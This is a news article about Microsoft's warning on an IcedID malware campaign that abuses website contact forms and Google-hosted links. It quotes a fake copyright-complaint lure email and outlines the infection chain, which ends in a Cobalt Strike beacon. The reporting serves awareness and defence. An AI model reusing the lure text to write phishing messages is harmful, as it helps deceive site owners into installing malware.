Breaking News Near Me | Trending News

Microsoft has a ‘warning’ on Google contact IDs

Microsoft has warned against a new, unique malware that can infect your computer via websites’ contact forms with fake legal threats. Attackers are using legitimate Google URLs to get into a computer system. The URLs require the target to sign in with his/her Google credentials and which leaves the system compromised.
As per Microsoft, the contact forms on websites are being abused by hackers to deliver malicious links. In the emails, a link is given so that the target can check the evidence behind the allegation. As soon as they click on the link, a malware called IcedID gets downloaded which can steal data from their computer systems and also lead to the installation of ransomware. The hackers are using Google URLs to cause the target to believe that it is safe to click.
The malicious emails
An example of such malicious email is given below:
“Hello. This is Meleena and I am a qualified photographer and illustrator. I was surprised, mildly speaking, when I saw my images at your website. If you use a copyrighted image without an owner’s consent, you must be aware that you could be sued by the copyright owner if it is unlawful to use stolen images and it’s so cheap! Here is this document with the links to my
images you used at (the website) and my earlier publications to get the evidence of my legal copyrights. Download it now and check this out for yourself.
(the malicious link)
If you don’t remove the images mentioned in the document above during the next few days. I’ll file a to your hosting provider informing them that my copyrights have been severely infringed and I am trying to protect my intellectual property And it doesn’t help trust me I am going to take it to court! And you won’t receive the second notice from me.”
Microsoft said in the blog post: “After the email recipient signs in, the sites.google.com page automatically downloads a malicious ZIP file, which contains a heavily obfuscated .js file. The malicious .js file is executed via WScript to create a shell object for launching PowerShell to download the IcedID payload (a .dat file), which is decrypted by a dropped DLL loader, as well as a Cobalt Strike beacon in the form of a stageless DLL, allowing attackers to remotely control the compromised device.”

Leave a Reply